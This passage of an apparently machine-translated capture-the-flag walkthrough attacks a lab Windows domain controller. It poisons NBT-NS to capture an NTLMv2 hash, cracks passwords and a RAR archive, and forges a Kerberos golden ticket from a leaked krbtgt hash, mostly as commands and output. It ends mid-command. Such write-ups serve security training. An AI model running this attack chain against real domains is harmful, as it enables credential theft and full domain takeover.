-Pn -sU -F $IP --max-rate 50 --min-rate 15\n[sudo] password for kali: \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-13 03:14 EDT\nNmap scan report for soupedecode.local (192.168.10.101)\nHost is up (0.00088s latency).\nNot shown: 96 open|filtered udp ports (no-response)\nPORT    STATE SERVICE\n53\/udp  open  domain\n88\/udp  open  kerberos-sec\n123\/udp open  ntp\n137\/udp open  netbios-ns\nMAC Address: 08:00:27:66:BA:0F (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 5.30 
seconds<\/code><\/pre>\n<p>Listen for a moment to see whether any hash comes back:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ ping $IP                      \nPING 192.168.10.101 (192.168.10.101) 56(84) bytes of data.\n64 bytes from 192.168.10.101: icmp_seq=1 ttl=128 time=2.12 ms\n64 bytes from 192.168.10.101: icmp_seq=2 ttl=128 time=0.752 ms\n64 bytes from 192.168.10.101: icmp_seq=3 ttl=128 time=0.824 ms\n64 bytes from 192.168.10.101: icmp_seq=4 ttl=128 time=0.747 ms\n^C\n--- 192.168.10.101 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3043ms\nrtt min\/avg\/max\/mdev = 0.747\/1.109\/2.115\/0.581 ms<\/code><\/pre>\n<p>But nothing unusual....<\/p>\n<h3>Web: hijacking the NTLM hash via NBNS<\/h3>\n<p>Opening the earlier web page with the username and password <code>admin:nimda<\/code> turns up this:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757876.png\" alt=\"image-20250613153132360\" \/><\/p>\n<blockquote>\n<p>Network Share Heartbeat 
is a mechanism for monitoring network shared resources, in particular the communication status between nodes in a cluster environment (such as Oracle RAC). It periodically sends and receives heartbeat packets to confirm whether a node is still active.<\/p>\n<\/blockquote>\n<p>Try listening to capture the <code>NTLMv2hash<\/code>:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757877.png\" alt=\"image-20250613153619223\" \/><\/p>\n<p>On the other side, the spoofed listener caught it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo responder -I eth0 -v \n[sudo] password for kali: \n                                         __\n  .----.-----.-----.-----.-----.-----.--|  |.-----.----.\n  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|\n  |__| |_____|_____|   __|_____|__|__|_____||_____|__|\n                   |__|\n\n           NBT-NS, LLMNR &amp; MDNS Responder 3.1.6.0\n\n  To support this project:\n  Github -&gt; https:\/\/github.com\/sponsors\/lgandx\n  Paypal  -&gt; https:\/\/paypal.me\/PythonResponder\n\n  Author: Laurent Gaffie 
(laurent.gaffie@gmail.com)\n  To kill this script hit CTRL-C\n\n[+] Poisoners:\n    LLMNR                      [ON]\n    NBT-NS                     [ON]\n    MDNS                       [ON]\n    DNS                        [ON]\n    DHCP                       [OFF]\n\n[+] Servers:\n    HTTP server                [ON]\n    HTTPS server               [ON]\n    WPAD proxy                 [OFF]\n    Auth proxy                 [OFF]\n    SMB server                 [ON]\n    Kerberos server            [ON]\n    SQL server                 [ON]\n    FTP server                 [ON]\n    IMAP server                [ON]\n    POP3 server                [ON]\n    SMTP server                [ON]\n    DNS server                 [ON]\n    LDAP server                [ON]\n    MQTT server                [ON]\n    RDP server                 [ON]\n    DCE-RPC server             [ON]\n    WinRM server               [ON]\n    SNMP server                [ON]\n\n[+] HTTP Options:\n    Always serving EXE         [OFF]\n    Serving EXE                [OFF]\n    Serving HTML               [OFF]\n    Upstream Proxy             [OFF]\n\n[+] Poisoning Options:\n    Analyze Mode               [OFF]\n    Force WPAD auth            [OFF]\n    Force Basic Auth           [OFF]\n    Force LM downgrade         [OFF]\n    Force ESS downgrade        [OFF]\n\n[+] Generic Options:\n    Responder NIC              [eth0]\n    Responder IP               [192.168.10.102]\n    Responder IPv6             [fd00:4c10:d50a:f900::1003]\n    Challenge set              [random]\n    Don&#039;t Respond To Names     [&#039;ISATAP&#039;, &#039;ISATAP.LOCAL&#039;]\n    Don&#039;t Respond To MDNS TLD  [&#039;_DOSVC&#039;]\n    TTL for poisoned response  [default]\n\n[+] Current Session Variables:\n    Responder Machine Name     [WIN-V59O5XD9V4P]\n    Responder Domain Name      [HEB4.LOCAL]\n    Responder DCE-RPC Port     [49647]\n\n[+] Listening for events...\n\n[SMB] NTLMv2-SSP Client   : 192.168.10.101\n[SMB] NTLMv2-SSP 
Username : soupedecode\\websvc\n[SMB] NTLMv2-SSP Hash     : websvc::soupedecode:27a657cc9b71fd<\/code><\/pre>\n<p>Try cracking it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ john -w=\/usr\/share\/wordlists\/rockyou.txt hash\nUsing default input encoding: UTF-8\nLoaded 1 password hash (netntlmv2, NTLMv2 C\/R [MD4 HMAC-MD5 32\/64])\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\njordan23         (websvc)     \n1g 0:00:00:00 DONE (2025-06-13 03:37) 6.250g\/s 6400p\/s 6400c\/s 6400C\/s 123456..bethany\nUse the &quot;--show --format=netntlmv2&quot; options to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<h3>Information gathering<\/h3>\n<p>This gives a new credential, <code>websvc:jordan23<\/code>; try gathering information with it:<\/p>\n<h4>SMB service probing<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ netexec smb $IP -u websvc -p jordan23\nSMB         192.168.10.101  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB         192.168.10.101  445    DC01             [-] SOUPEDECODE.LOCAL\\websvc:jordan23 STATUS_PASSWORD_EXPIRED <\/code><\/pre>\n<p>The credential turns out to be expired. This is a bug in the box, and it is handled the same way as before: just change the password.<\/p>\n<ul>\n<li>\n<p>Right <code>ctrl<\/code>+<code>delete<\/code> to unlock<\/p>\n<\/li>\n<li>\n<p><code>esc<\/code> to switch to the user-selection screen \u00d74<\/p>\n<\/li>\n<li>\n<p>Other users<\/p>\n<\/li>\n<li>\n<p>Local or domain account 
password (if it gets stuck, press the up\/down arrow keys)<\/p>\n<\/li>\n<li>\n<p>Password login screen<\/p>\n<\/li>\n<li>\n<p>It reports that the password has expired and must be changed<\/p>\n<\/li>\n<li>\n<p>Change the password<\/p>\n<\/li>\n<li>\n<p>Press Enter<\/p>\n<\/li>\n<\/ul>\n<p>And the change succeeded!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ smbmap -H $IP -u websvc -p hgbepass  \n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  
\\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n-----------------------------------------------------------------------------\nSMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB                                                                                                  \n[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      \n\n[+] IP: 192.168.10.101:445      Name: soupedecode.local         Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        ADMIN$                                                  NO ACCESS       Remote Admin\n        C                                                       READ ONLY\n        C$                                                      NO ACCESS       Default share\n        IPC$                                                    READ ONLY       Remote IPC\n        NETLOGON                                                READ ONLY       Logon server share \n        SYSVOL                                                  READ ONLY       Logon server share \n[*] Closed 1 connections                                                                                                     \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ netexec smb $IP -u websvc -p hgbepass\nSMB         192.168.10.101  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB         192.168.10.101  445    DC01             [+] 
SOUPEDECODE.LOCAL\\websvc:hgbepass<\/code><\/pre>\n<p>Then grab <code>user.txt<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ smbclient -U &quot;websvc&quot; \/\/$IP\/C      \nPassword for [WORKGROUP\\websvc]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  $WinREAgent                        DH        0  Sat Jun 15 15:19:51 2024\n  Documents and Settings          DHSrn        0  Sat Jun 15 22:51:08 2024\n  DumpStack.log.tmp                 AHS    12288  Fri Jun 13 18:28:35 2025\n  pagefile.sys                      AHS 1476395008  Fri Jun 13 18:28:35 2025\n  PerfLogs                            D        0  Sat May  8 04:15:05 2021\n  Program Files                      DR        0  Sat Jun 15 13:54:31 2024\n  Program Files (x86)                 D        0  Sat May  8 05:34:13 2021\n  ProgramData                       DHn        0  Tue Nov  5 16:44:31 2024\n  Recovery                         DHSn        0  Sat Jun 15 22:51:08 2024\n  System Volume Information         DHS        0  Sat Jun 15 15:02:21 2024\n  Users                              DR        0  Wed Nov  6 20:55:53 2024\n  Windows                             D        0  Thu Nov  7 17:32:13 2024\n  xampp                               D        0  Tue Nov  5 17:56:28 2024\n\n                12942591 blocks of size 4096. 10496839 blocks available\nsmb: \\&gt; cd users\nsmb: \\users\\&gt; ls\n  .                                  DR        0  Wed Nov  6 20:55:53 2024\n  ..                                
DHS        0  Tue Nov  5 18:30:29 2024\n  Administrator                       D        0  Sat Jun 15 15:56:40 2024\n  All Users                       DHSrn        0  Sat May  8 04:26:16 2021\n  Default                           DHR        0  Sat Jun 15 22:51:08 2024\n  Default User                    DHSrn        0  Sat May  8 04:26:16 2021\n  desktop.ini                       AHS      174  Sat May  8 04:14:03 2021\n  fjudy998                            D        0  Wed Nov  6 20:55:33 2024\n  ojake987                            D        0  Wed Nov  6 20:55:16 2024\n  Public                             DR        0  Sat Jun 15 13:54:32 2024\n  rtina979                            D        0  Wed Nov  6 20:54:39 2024\n  websvc                              D        0  Wed Nov  6 20:44:11 2024\n  xursula991                          D        0  Wed Nov  6 20:55:28 2024\n\n                12942591 blocks of size 4096. 10487505 blocks available\nsmb: \\users\\&gt; cd websvc\nsmb: \\users\\websvc\\&gt; cd desktop\nsmb: \\users\\websvc\\desktop\\&gt; ls\n  .                                  DR        0  Thu Nov  7 14:08:21 2024\n  ..                                  D        0  Wed Nov  6 20:44:11 2024\n  user.txt                            A       32  Thu Nov  7 05:07:55 2024\n\n                12942591 blocks of size 4096. 
10528272 blocks available\nsmb: \\users\\websvc\\desktop\\&gt; get user.txt\ngetting file \\users\\websvc\\desktop\\user.txt of size 32 as user.txt (1.6 KiloBytes\/sec) (average 1.6 KiloBytes\/sec)\nsmb: \\users\\websvc\\desktop\\&gt; exit\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ cat user.txt  \n709e449a996a85aa7deaf18c79515d6a<\/code><\/pre>\n<h2>Privilege escalation<\/h2>\n<h3>SMB enumeration<\/h3>\n<p>Quite a few users were found; try gathering more information on them:<\/p>\n<pre><code class=\"language-bash\">fjudy998\nojake987\nrtina979\nxursula991<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ nxc smb $IP -u websvc -p &#039;hgbepass&#039; --users &gt; log\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ cat log | grep &quot;fjudy998&quot;\nSMB                      192.168.10.101  445    DC01             fjudy998                      2024-06-15 20:05:26 0       Music lover and aspiring guitarist \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ cat log | grep &quot;ojake987&quot;\nSMB                      192.168.10.101  445    DC01             ojake987                      2024-06-15 20:05:25 0       Tech geek and gadget collector \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ cat log | grep &quot;rtina979&quot;\nSMB                      192.168.10.101  445    DC01             rtina979                      2024-11-07 01:53:17 0       Default Password Z~l3JhcV#7Q-1#M \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ cat log | grep &quot;xursula991&quot;\nSMB                      192.168.10.101  445    DC01             xursula991                    
2024-06-15 20:05:26 0       Yoga practitioner and meditation lover<\/code><\/pre>\n<p>That gives a new credential: <code>rtina979:Z~l3JhcV#7Q-1#M<\/code>. Checking what is in that user's directories, this credential turns out to be expired as well, so change it the same way:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ nxc smb $IP -u websvc -p hgbepass\nSMB         192.168.10.101  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB         192.168.10.101  445    DC01             [+] SOUPEDECODE.LOCAL\\websvc:hgbepass \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ smbmap -H $IP -u rtina979 -p hgbepass\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  
\\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n-----------------------------------------------------------------------------\nSMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 1 SMB connections(s) and 1 authenticated session(s)\n\n[+] IP: 192.168.10.101:445      Name: soupedecode.local         Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        ADMIN$                                                  NO ACCESS       Remote Admin\n        C                                                       READ ONLY\n        C$                                                      NO ACCESS       Default share\n        IPC$                                                    READ ONLY       Remote IPC\n        NETLOGON                                                READ ONLY       Logon server share \n        SYSVOL                                                  READ ONLY       Logon server share \n[*] Closed 1 connections<\/code><\/pre>\n<p>Then take a look at the share:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ smbclient -U &quot;rtina979&quot; \/\/$IP\/C\nPassword for [WORKGROUP\\rtina979]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  $WinREAgent                        DH        0  Sat Jun 15 15:19:51 2024\n  Documents and Settings          DHSrn        0  Sat Jun 15 22:51:08 2024\n  DumpStack.log.tmp                 AHS    12288 
 Fri Jun 13 18:28:35 2025\n  pagefile.sys                      AHS 1476395008  Fri Jun 13 18:28:35 2025\n  PerfLogs                            D        0  Sat May  8 04:15:05 2021\n  Program Files                      DR        0  Sat Jun 15 13:54:31 2024\n  Program Files (x86)                 D        0  Sat May  8 05:34:13 2021\n  ProgramData                       DHn        0  Tue Nov  5 16:44:31 2024\n  Recovery                         DHSn        0  Sat Jun 15 22:51:08 2024\n  System Volume Information         DHS        0  Sat Jun 15 15:02:21 2024\n  Users                              DR        0  Wed Nov  6 20:55:53 2024\n  Windows                             D        0  Thu Nov  7 17:32:13 2024\n  xampp                               D        0  Tue Nov  5 17:56:28 2024\n\n                12942591 blocks of size 4096. 10589613 blocks available\nsmb: \\&gt; cd users\/rtina979\/desktop\nsmb: \\users\\rtina979\\desktop\\&gt; ls\n  .                                  DR        0  Sat May  8 04:15:05 2021\n  ..                                  D        0  Wed Nov  6 20:54:39 2024\n\n                12942591 blocks of size 4096. 10589613 blocks available\nsmb: \\users\\rtina979\\desktop\\&gt; cd ..\nsmb: \\users\\rtina979\\&gt; ls\n  .                                   D        0  Wed Nov  6 20:54:39 2024\n  ..                                 
DR        0  Wed Nov  6 20:55:53 2024\n  AppData                            DH        0  Wed Nov  6 20:54:39 2024\n  Application Data                DHSrn        0  Wed Nov  6 20:54:39 2024\n  Cookies                         DHSrn        0  Wed Nov  6 20:54:39 2024\n  Desktop                            DR        0  Sat May  8 04:15:05 2021\n  Documents                          DR        0  Thu Nov  7 17:35:52 2024\n  Downloads                          DR        0  Sat May  8 04:15:05 2021\n  Favorites                          DR        0  Sat May  8 04:15:05 2021\n  Links                              DR        0  Sat May  8 04:15:05 2021\n  Local Settings                  DHSrn        0  Wed Nov  6 20:54:39 2024\n  Music                              DR        0  Sat May  8 04:15:05 2021\n  My Documents                    DHSrn        0  Wed Nov  6 20:54:39 2024\n  NetHood                         DHSrn        0  Wed Nov  6 20:54:39 2024\n  NTUSER.DAT                        AHn   131072  Fri Jun 13 18:32:06 2025\n  ntuser.dat.LOG1                   AHS    90112  Wed Nov  6 20:54:39 2024\n  ntuser.dat.LOG2                   AHS        0  Wed Nov  6 20:54:39 2024\n  NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TM.blf    AHS    65536  Wed Nov  6 20:54:45 2024\n  NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Wed Nov  6 20:54:39 2024\n  NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Wed Nov  6 20:54:39 2024\n  ntuser.ini                        AHS       20  Wed Nov  6 20:54:39 2024\n  Pictures                           DR        0  Sat May  8 04:15:05 2021\n  Recent                          DHSrn        0  Wed Nov  6 20:54:39 2024\n  Saved Games                        Dn        0  Sat May  8 04:15:05 2021\n  SendTo                          DHSrn        0  Wed Nov  6 20:54:39 2024\n  Start Menu                      DHSrn        0  Wed Nov  6 
20:54:39 2024\n  Templates                       DHSrn        0  Wed Nov  6 20:54:39 2024\n  Videos                             DR        0  Sat May  8 04:15:05 2021\n\n                12942591 blocks of size 4096. 10589613 blocks available\nsmb: \\users\\rtina979\\&gt; cd documents\nsmb: \\users\\rtina979\\documents\\&gt; ls\n  .                                  DR        0  Thu Nov  7 17:35:52 2024\n  ..                                  D        0  Wed Nov  6 20:54:39 2024\n  My Music                        DHSrn        0  Wed Nov  6 20:54:39 2024\n  My Pictures                     DHSrn        0  Wed Nov  6 20:54:39 2024\n  My Videos                       DHSrn        0  Wed Nov  6 20:54:39 2024\n  Report.rar                          A   712046  Thu Nov  7 08:35:49 2024\n\n                12942591 blocks of size 4096. 10589613 blocks available\nsmb: \\users\\rtina979\\documents\\&gt; get Report.rar\ngetting file \\users\\rtina979\\documents\\Report.rar of size 712046 as Report.rar (7726.2 KiloBytes\/sec) (average 7726.2 KiloBytes\/sec)\nsmb: \\users\\rtina979\\documents\\&gt; exit<\/code><\/pre>\n<h3>Cracking the archive password<\/h3>\n<p>There is an archive. Trying to extract it shows it is password-protected, so try cracking the password:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ unrar e Report.rar \n\nUNRAR 7.11 freeware      Copyright (c) 1993-2025 Alexander Roshal\n\nEnter password (will not be echoed) for Report.rar: \n\nThe specified password is incorrect.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ rar2john Report.rar &gt; hash1\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ john -w=\/usr\/share\/wordlists\/rockyou.txt hash1\nUsing default input encoding: UTF-8\nLoaded 1 password hash (RAR5 [PBKDF2-SHA256 128\/128 SSE2 4x])\nCost 1 (iteration count) is 32768 for all loaded 
hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nPASSWORD123      (Report.rar)     \n1g 0:00:03:48 DONE (2025-06-13 04:29) 0.004368g\/s 224.4p\/s 224.4c\/s 224.4C\/s abby23..MANMAN\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed. \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ unrar e Report.rar \n\nUNRAR 7.11 freeware      Copyright (c) 1993-2025 Alexander Roshal\n\nEnter password (will not be echoed) for Report.rar: \n\nExtracting from Report.rar\n\nExtracting  Pentest Report.htm                                        OK \nExtracting  m2-unbound-source-serif-pro.css                           OK \nExtracting  main-branding-base.W9J-2zkF03j8TkriAGn1Tg.12.css          OK \nExtracting  dart.min.js                                               OK \nExtracting  google-analytics_analytics.js                             OK \nExtracting  highlight.min.js                                          OK \nExtracting  main-base.bundle.IcW7tD43-xaHoBj2_P6wLQ.12.js             OK \nExtracting  main-common-async.bundle.SkTeOM8g4JVEInYAgrgW9Q.12.js     OK \nExtracting  main-notes.bundle.qVLVB-ghGjYQMo6npDHNjw.12.js            OK \nExtracting  main-posters.bundle.JMIo8YhZ0NhbVObiML4nWQ.12.js          OK \nAll OK<\/code><\/pre>\n<p>Take a look at the report:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131757878.png\" alt=\"image-20250613163510490\" \/><\/p>
\n<p>It leaks a few things:<\/p>\n<ul>\n<li><code>file_svc:Password123!!<\/code><\/li>\n<li><code>file_svc:$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$soupedecode.local\/file_svc*$afade2a48795f1f<\/code>\n<ul>\n<li>Looks like this one could be cracked<\/li>\n<\/ul>\n<\/li>\n<li><code>SMB 192.168.56.121 445 DC01 [+] soupedecode.local\\ybob317:ybob317<\/code><\/li>\n<li><code>krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0f55cdc40bd8f5814587f7e6b2f85e6f:::<\/code><\/li>\n<\/ul>\n<p>The first three all seem to be wrong (those users have not been seen anywhere); the last one is right:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ netexec ldap $IP -u krbtgt -H 0f55cdc40bd8f5814587f7e6b2f85e6f\n[*] Initializing LDAP protocol database\nLDAP        192.168.10.101  389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL)\nLDAP        192.168.10.101  389    DC01             [-] SOUPEDECODE.LOCAL\\krbtgt:0f55cdc40bd8f5814587f7e6b2f85e6f STATUS_ACCOUNT_DISABLED<\/code><\/pre>\n<ul>\n<li>This shows that the <code>krbtgt<\/code> account is disabled in Active Directory, but it does exist.<\/li>\n<\/ul>\n<h3>Generating a golden ticket<\/h3>\n<p>First the <code>SID<\/code> of the <code>DOMAIN<\/code> is needed:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ impacket-lookupsid websvc:hgbepass@$IP \nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Brute forcing SIDs at 192.168.10.101\n[*] StringBinding 
ncacn_np:192.168.10.101[\\pipe\\lsarpc]\n[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164\n------------------<\/code><\/pre>\n<p>From here on it is a matter of following the experts' writeups:<\/p>\n<h4>\/etc\/krb5.conf<\/h4>\n<p>First set up the configuration file <code>\/etc\/krb5.conf<\/code>:<\/p>\n<pre><code class=\"language-bash\">[libdefaults]\n    default_realm = SOUPEDECODE.LOCAL\n    dns_lookup_kdc = true\n\n[realms]\n    SOUPEDECODE.LOCAL = {\n        kdc = dc01.soupedecode.local\n        admin_server = dc01.soupedecode.local\n    }\n[domain_realm]\n        soupedecode.local = SOUPEDECODE.LOCAL\n        .soupedecode.local = SOUPEDECODE.LOCAL<\/code><\/pre>\n<h4>Running the script<\/h4>\n<pre><code class=\"language-bash\"># sudo apt install ntpsec-ntpdate\nIP=192.168.10.101\nsudo ntpdate -u $IP\nimpacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain soupedecode.local  administrator\nexport KRB5CCNAME=administrator.ccache\nKRB5CCNAME=administrator.ccache   evil-winrm -i $IP -u administrator -r soupedecode.local<\/code><\/pre>\n<p>But it failed:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ .\/exp.sh \n2025-06-13 19:57:16.465238 (-0400) +54001.739300 +\/- 0.000713 192.168.10.101 s1 no-leap\nCLOCK: time stepped by 54001.739300\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Creating basic skeleton ticket and PAC Infos\n[*] Customizing ticket for soupedecode.local\/administrator\n[*]     PAC_LOGON_INFO\n[*]     PAC_CLIENT_INFO_TYPE\n[*]     EncTicketPart\n[*]     EncAsRepPart\n[*] Signing\/Encrypting final ticket\n[*]     PAC_SERVER_CHECKSUM\n[*]     PAC_PRIVSVR_CHECKSUM\n[*]     EncTicketPart\n[*]     EncASRepPart\n[*] Saving ticket in administrator.ccache\n\nEvil-WinRM shell v3.7\n\nWarning: Remote 
path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc&#039; for module Reline\n\nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n\nWarning: User is not needed for Kerberos auth. Ticket will be used\n\nInfo: Establishing connection to remote endpoint\n\nError: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure.  Minor code may provide more information\nCannot contact any KDC for realm &#039;SOUPEDECODE.LOCAL&#039;\n\nError: Exiting with code 1<\/code><\/pre>\n<p>I tried again on a different <code>kali<\/code> machine, but the same problem still appeared... Then I followed the steps in the third blog and solved it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo rdate -n 192.168.10.101                                                                        \nimpacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain soupedecode.local  administrator\nexport KRB5CCNAME=administrator.ccache\nimpacket-wmiexec soupedecode.local\/administrator@dc01.soupedecode.local -k -target-ip 192.168.10.101\nFri Jun 13 20:27:16 EDT 2025\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Creating basic skeleton ticket and PAC Infos\n[*] Customizing ticket for soupedecode.local\/administrator\n[*]     PAC_LOGON_INFO\n[*]     PAC_CLIENT_INFO_TYPE\n[*]     EncTicketPart\n[*]     EncAsRepPart\n[*] Signing\/Encrypting final ticket\n[*]     PAC_SERVER_CHECKSUM\n[*]     PAC_PRIVSVR_CHECKSUM\n[*]     EncTicketPart\n[*]     EncASRepPart\n[*] Saving ticket in administrator.ccache\nImpacket v0.13.0.dev0 - 
Copyright Fortra, LLC and its affiliated companies \n\nPassword:\n[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo systemctl stop systemd-timesyncd\nFailed to stop systemd-timesyncd.service: Unit systemd-timesyncd.service not loaded.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ date\nFri Jun 13 05:43:13 AM EDT 2025\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo ntpdate -q 192.168.10.101       \n2025-06-13 20:28:41.432572 (-0400) +53096.984937 +\/- 0.000667 192.168.10.101 s1 no-leap\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo date -s &quot;2025-06-13 20:33:41&quot;\nFri Jun 13 08:33:41 PM EDT 2025\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo rdate -n 192.168.10.101                                                                        \nimpacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain soupedecode.local  administrator\nexport KRB5CCNAME=administrator.ccache\nimpacket-wmiexec 